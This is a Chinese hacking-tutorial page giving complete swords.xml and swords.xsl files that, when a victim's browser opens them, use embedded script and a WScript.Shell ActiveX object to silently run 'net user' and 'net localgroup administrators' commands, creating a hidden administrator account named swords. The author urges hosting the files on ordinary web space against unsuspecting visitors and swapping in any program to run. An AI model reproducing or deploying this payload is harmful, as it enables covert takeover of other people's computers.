手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >利用xml+xsl给客户机添加超级管理帐户!
利用xml+xsl给客户机添加超级管理帐户!
摘要:用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run...

用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.

这个程序加了一个用户为 swords,密码为est的超级管理员账号。

swords.xml

<?xml version="1.0" encoding="GB2312"?>

<?xml-stylesheet type="text/xsl" href="swords.xsl"?>

<name>I am swords,I am admin!</name>

swords.xsl

<?xml version="1.0" encoding="gb2312"?>

<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">

<xsl:template match="/">

<html>

<body>

<xsl:value-of select="name" />

<xsl:script>

function run()

{

var wsh;

var wsh = new ActiveXObject("WScript.Shell");

wsh.run( "net user swords est /add",0);

wsh.run( "net localgroup administrators swords /add",0);

wsh.run( "cmd.exe /c echo test!");

}

</xsl:script>

<xsl:eval>run()</xsl:eval>

</body>

</html>

</xsl:template>

</xsl:stylesheet>

【利用xml+xsl给客户机添加超级管理帐户!】相关文章:

新兴木马NameLess BackDoor复仇记(图)

记一次巧妙的hacking

ADSL密码大集合

专家观点:破解MD5和SHA-1不意味密码破解(图)

从后台到webshell的一点思路

黑客之门的魅力:感染与加载(图)

晓宇听幽网站内容管理系统 V2.0

域名劫持---163.net被黑的分析

MSHTA漏洞为黑客大开远程控制之门(图)

青创文章系统安全性分析

精品推荐
分类导航